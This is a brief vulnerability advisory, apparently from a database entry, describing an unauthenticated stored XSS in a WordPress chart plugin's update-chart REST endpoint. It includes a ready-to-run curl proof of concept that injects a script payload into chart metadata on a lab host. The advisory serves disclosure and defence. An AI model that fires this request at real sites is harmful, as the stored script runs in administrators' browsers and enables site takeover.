By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
curl -i -s -k -X $'POST' \
-H $'Host: 192.168.158.128:8000' -H $'Content-Type: application/json' \
--data-binary $'{\"id\": 7, \"visualizer-chart-type\": \"\\\"><script>alert(1);</script><span data-x=\\\"\"}' \
$'http://192.168.158.128:8000/wp-json/visualizer/v1/update-chart'
See the references for more details Nathan Davison
No
2019-09-28 (about 3 years ago)
2019-09-28 (about 3 years ago)
2020-09-22 (about 2 years ago)